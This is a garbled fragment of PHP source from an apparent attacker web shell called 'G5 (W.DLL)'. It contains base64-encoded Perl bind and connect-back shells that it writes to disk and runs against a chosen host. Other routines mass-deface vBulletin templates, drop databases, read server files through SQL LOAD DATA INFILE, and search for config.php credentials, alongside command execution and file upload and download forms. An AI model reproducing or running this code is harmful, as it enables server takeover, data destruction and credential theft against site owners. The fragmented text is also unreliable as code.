(strstr($trow[0],'Database')!='')$obj='db'; elseif (substr($trow[0],0,6)=='Tables') $obj='tbl';else$obj='row';$i=0;foreach ($row as $a){if($a!='')$data[$i++]=explode('+',$a);} echo ""; foreach ($trow as $ti)echo "";echo "";$j=0; while ($data[$j]){echo "";foreach ($data[$j++] as $dr){echo "";}echo "";}echo "
$ti
";if($obj!='row') echo "";echo $dr;if($obj!='row') echo "";echo " Drop

";}} function sqlqu($sqlty,$host,$user,$pass,$db='',$query){ $res=''; switch($sqlty){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=@mysql_connect($host,$user,$pass); if($link){ if(!empty($db))@mysql_select_db($db,$link); $result=@mysql_query($query,$link); if ($result!=1){ while($data=@mysql_fetch_row($result))$res.=implode('+',$data).'-+'; $res.='*'; for($i=0;$i<@mysql_num_fields($result);$i++) $res.=@mysql_field_name($result,$i).'-';} @mysql_close($link); return $res;}break; case 'MSSQL': if(!function_exists('mssql_connect'))return 0; $link=@mssql_connect($host,$user,$pass); if($link){ if(!empty($db))@mssql_select_db($db,$link); $result=@mssql_query($query,$link); while($data=@mssql_fetch_row($result))$res.=implode('+',$data).'-+'; $res.='*'; for($i=0;$i<@mssql_num_fields($result);$i++) $res.=@mssql_field_name($result,$i).'-'; @mssql_close($link); return $res; } break; case 'Oracle': if(!function_exists('ocilogon'))return 0; $link=@ocilogon($user,$pass,$db); if($link){ $stm=@ociparse($link,$query); @ociexecute($stm,OCI_DEFAULT); while($data=@ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('+',$data).'-+'; $res.='*'; for($i=0;$i$query) { if(strlen($query)>5){ echo "
Query# ::".$num." : ".htmlspecialchars($query)."
"; $qry = @mysql_query($query,$log); $error = @mysql_error($log); if($error) { echo "
Error : ".$error."

"; } else {if (@mysql_num_rows($qry) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($qry))) { $keys = @implode("  ", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode("  ",$values); $sql2 .= " ".$values." "; } echo "";$sql = "";$sql .= $sql2;echo $sql;echo "
".$keys."

";if(($rows = @mysql_affected_rows($log))>=0) { echo "
affected rows : ".$rows."

"; }}else { if(($rows = @mysql_affected_rows($log))>=0) { echo "
affected rows : ".$rows."

"; } }}@mysql_free_result($qry);}} @mysql_close($log);} else echo "
Can't connect to MySQL server
";} function db_mass($coded,$msi) {global $db,$log; if (!$log){echo 'Could not connect:' . @mysql_error($log);}else echo "Login DB Done ^_*
"; $other = stripcslashes($_POST['msqur']); $wdll =''; switch($msi){ case('msvb'):{ $wdll ='UPDATE '.$db.'.template SET template = \''.$coded.'\' WHERE title = "FORUMHOME"'; $wdlll = 'UPDATE '.$db.'.template SET template =\''.$coded.'\' WHERE title ="spacer_open"'; }break;//VB case('msbb'):{}break; case('msin'):{}break; case('mswp'):{}break; case('msjo'):{}break; case('msrd'):{$wdll = 'DROP DATABASE '.$db.'';}break; case('msot'):{$wdll = $other;}break;} $qry = @mysql_query($wdll, $log);if($qry) {echo "WORK! Done
";} if($msi = 'msvb'){ $qry = @mysql_query($wdlll , $log);} if($qry){echo "
L00K ...http://" . $_SERVER['HTTP_HOST'] . " Enjoy...^_^"; }@mysql_close($log); unset($wdll); echo "

Back";} function sqlf($filehd) { global $log ; if (!$log){echo 'Could not connect: ' . @mysql_error($log);} $qrt = 'CREATE TABLE `wdll` ('. ' `wdll` LONGBLOB NOT NULL'. ' );'; $qry = "LOAD DATA INFILE \"".$filehd."\" INTO TABLE wdll"; $qrf = "SELECT * FROM wdll;"; $qrd = "DROP TABLE wdll;"; @mysql_query($qrt , $log); @mysql_query($qry, $log); $rs= @mysql_query($qrf, $log); if (!$rs) {echo "\nError in reading file (permision denied)!\n";} else {$file = ""; while ($row = @mysql_fetch_array($rs, MYSQL_ASSOC)) {$file .= @join ("\r\n",$row);} if (empty($file)) {echo "\nFile \"".$filehd."\" does not exists or empty!\n";} else {echo $file;} @mysql_free_result($rs); @mysql_query($qrd, $log);}} function bbc($bo ,$ip ='' ){ if($_REQUEST['lbg']) {$lbpi="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0oJy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g"; $op=@fopen("lbg.pl","w"); @fwrite($op,@base64_decode($lbpi)); @fclose($op); if(wdll_chf()) {wdll_cmdf("perl lbg.pl $bo");echo "
connected to $bo ";echo "";} else die("
I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode $bo");} if($_REQUEST['wbp']) {$wbpi="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmluZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIsIFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVOVCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; $op=@fopen("wbg.pl","w"); @fwrite($op,@base64_decode($wbp)); @fclose($op); if(wdll_chf()) {wdll_cmdf("perl wbg.pl $bo"); echo "
connected to $bo";echo "";} else die("
I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode $bo");} if($_REQUEST['bpg'] ) {$bpgi ="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1ZbMV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlwdC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5nIHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNoYW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGllKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwogIG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; $op =@fopen("bcc.pl","w"); @fwrite($op,@base64_decode($bpgi)); @fclose($op); if(wdll_chf()) {wdll_cmdf("perl bpg.pl $ip $bo"); echo "
connected to $ip $bo";echo "";}else die("
I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode ");}} function wdir(){foreach (@range("A","Z") as $dr) {if (@is_dir($dr.":\\")){$drr=$dr.":\\";$ddr=$ddr.''.$dr.':-- ';}}echo $ddr;} wdll_bdy(); ft(); // G5 (W.DLL) v2.0 8/8/2010 - last edit 20/9/2011) Lines after gzip = 1393 size = 86KB Coded by Piaster (wadelamin) //for bug: w.dll@live.com. ?>

md5:	'; inp('text','80','cc',stripcslashes(@md5($crtf)),'',' ');echo "
crypt:	'; inp('text','80','cc',stripcslashes(@crypt($crtf)),'',' ');echo "
sha1:	'; inp('text','80','cc',stripcslashes(@sha1($crtf)),'',' '); echo "
crc32:	'; inp('text','80','cc',stripcslashes(@crc32($crtf)),'',' '); echo "
urlencode:	'; inp('text','80','cc',stripcslashes(@urlencode($crtf)),'',' '); echo "
urldecode:	'; inp('text','80','cc',stripcslashes(@urldecode($crtf)),'',' ');echo "
base64_encode:	'; inp('text','80','cc',stripcslashes(@base64_encode($crtf)),'',' '); echo '
base64_decode:	'; inp('text','80','cc',stripcslashes(@base64_decode($_POST['crrt'])),'',' '); echo "
dec2hex:	'; $c = strlen($crtf); for($i=0;$i<$c;$i++) { $hex = dechex(ord($crtf[$i])); if ($crtf[$i] == "&") {echo $crtf[$i];} elseif ($crtf[$i] != "\\") {echo "%".$hex;}} echo '

Execute	"; inp('text','55','cmde',$aliss,'');sub('cmdr','CMD',$pr=' ');echo "
Get File	"; echo""; if(isset($HTTP_POST_VARS['cfil']))$oop = $_POST['cfil'];else $oop = path; inp('text','42','cfil',$oop,'');sub('gfil',' Get ',' ');echo "
Go Dir	"; inp('text','55','goto',path,'');sub('gotod',' Go ',' ');echo "
Locate	"; inp('text','55','fin','config.php','');sub('find','Find');echo "
Upload	"; inp('hidden','55','MAX_FILE_SIZE',$umf,''); echo ""; sub('upcom',' Up ',' ');echo "

MK Dir	"; inp('text','55','mKd',path,'');sub('mkD',' MKD ',$pr=' ');echo "
MK File	"; inp('text','55','mKf',path,'');sub('mkF',' MKF ',' ');echo "
Download	"; inp('text','55','dWn',path,'');sub('dWNf','down',' ');echo "
File options	"; ch();echo "
Execute	"; alias(); echo "

$ti
";if($obj!='row') echo "";echo $dr;if($obj!='row') echo "";echo "	Drop